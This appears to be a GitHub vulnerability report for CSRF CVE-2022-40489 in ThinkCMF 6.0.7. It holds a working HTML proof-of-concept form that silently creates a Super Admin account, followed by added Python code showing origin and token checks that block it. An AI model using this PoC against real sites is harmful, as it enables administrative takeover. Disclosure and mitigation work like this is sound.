CVE-2022-40489: I found a CSRF that creates a Super Admin account. · Issue #736 · thinkcmf/thinkcmf
ThinkCMF version 6.0.7 is affected by a Cross-Site Request Forgery (CSRF) vulnerability that allows an attacker to add a Super Administrator account to the administrative users by forging a request on behalf of a logged-in administrator.
Hi,
I found a CSRF in ThinkCMF version 6.0.7 that allows a remote user to add a Super Admin account by taking advantage of the session of an administrator who is logged into the system. Below are the steps to reproduce this issue.
<html>
<body>
<h1>CSRF - SuperAdmin User Creation</h1>
<!-- Rewrites the visible URL so the victim does not see the PoC page's real path -->
<script>history.pushState('', '', '/')</script>
<!-- Cross-site POST to the admin user-creation endpoint. The browser attaches the
     victim administrator's session cookie; the endpoint requires no anti-CSRF token -->
<form action="http://localhost/admin/user/addpost.html" method="POST">
<input type="hidden" name="user_login" value="SuperAdmin" />
<input type="hidden" name="user_pass" value="SuperAdmin999qweasd" />
<input type="hidden" name="user_email" value="superadmin@yopmail.com" />
<!-- role_id[] carries the role(s) assigned to the new account -->
<input type="hidden" name="role_id[]" value="2" />
<input type="hidden" name="role_id[]" value="1" />
<input type="submit" value="Submit request" />
</form>
<script>
// Uncomment to submit automatically on page load instead of requiring a click
//document.forms[0].submit();
</script>
</body>
</html>
Fig. 1: Vulnerable page
Fig. 2: CSRF Payload
Fig. 3: CSRF Payload Executed
Fig. 4: Super Admin account added
Fig. 5: Super Admin logged in
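The server-side check that the endpoint targeted by the PoC is missing, written as an added example (this is not ThinkCMF's code and not part of the report): an Origin/Referer check plus a per-session synchronizer token, applied before the user-creation handler is allowed to run. The admin origin is taken from the PoC's action URL; the hidden field name `__token__`, the session store, the attacker origin `http://attacker.example` and the request dictionaries are all assumptions constructed here.

```python
"""Server-side CSRF defence for a state-changing admin endpoint, written as an
illustration of what /admin/user/addpost.html is missing. Example code, not
ThinkCMF's: the session store, the header/form dicts and the attacker origin
are all constructed here."""
import hmac
import secrets
from urllib.parse import urlsplit

# Origin of the admin panel, taken from the action URL in the PoC form.
SITE_ORIGIN = "http://localhost"

# Field values copied from the PoC form above (the constructed cross-site POST).
POC_FORM = {
    "user_login": "SuperAdmin",
    "user_pass": "SuperAdmin999qweasd",
    "user_email": "superadmin@yopmail.com",
    "role_id[]": ["2", "1"],
}


class Session:
    """Minimal stand-in for a server-side session keyed by the admin's cookie."""

    def __init__(self):
        self.data = {}


def issue_csrf_token(session):
    """Create a per-session synchronizer token and remember it server-side.
    The legitimate admin form embeds it as a hidden field; an attacker's page
    cannot read it because the same-origin policy hides the admin page's DOM."""
    token = secrets.token_urlsafe(32)
    session.data["csrf_token"] = token
    return token


def _origin_allowed(headers):
    """Browsers attach an Origin header to cross-site form POSTs. Accept only
    the site's own origin; fall back to Referer, and fail closed if neither
    is present (a sandboxed frame sends Origin: null, which also fails)."""
    origin = headers.get("Origin")
    if origin is None:
        referer = headers.get("Referer")
        if referer is None:
            return False
        parts = urlsplit(referer)
        origin = f"{parts.scheme}://{parts.netloc}"
    return origin == SITE_ORIGIN


def _token_valid(session, form):
    """Constant-time comparison of the submitted token (assumed field name
    __token__) against the one stored in the session."""
    expected = session.data.get("csrf_token")
    supplied = form.get("__token__")
    if not expected or not isinstance(supplied, str):
        return False
    return hmac.compare_digest(expected.encode(), supplied.encode())


def check_addpost(session, headers, form):
    """Gate for the user-creation handler: returns (accepted, reason).
    Both the origin check and the token check must pass; only then would the
    real handler go on to create the account."""
    if not _origin_allowed(headers):
        return False, "origin mismatch"
    if not _token_valid(session, form):
        return False, "missing or invalid CSRF token"
    return True, "ok"


def replay_poc(session):
    """Replay the PoC: a POST from an attacker-controlled page (constructed
    origin) that carries the victim admin's session but no token."""
    return check_addpost(session, {"Origin": "http://attacker.example"}, POC_FORM)


def legitimate_post(session, token):
    """The same form submitted from the real admin UI with its token."""
    form = dict(POC_FORM, __token__=token)
    headers = {"Origin": SITE_ORIGIN, "Referer": SITE_ORIGIN + "/admin/user/add.html"}
    return check_addpost(session, headers, form)


if __name__ == "__main__":
    s = Session()
    t = issue_csrf_token(s)
    print("PoC replay:", replay_poc(s))
    print("legitimate:", legitimate_post(s, t))
```

The two checks are deliberately independent: the origin check alone is defeated if the server ever has to accept requests lacking both headers, and the token alone is defeated if the token leaks, so both must pass before any row is written. Marking the admin session cookie `SameSite=Lax` or `Strict` is a further layer that stops the browser from attaching it to the cross-site POST in the first place.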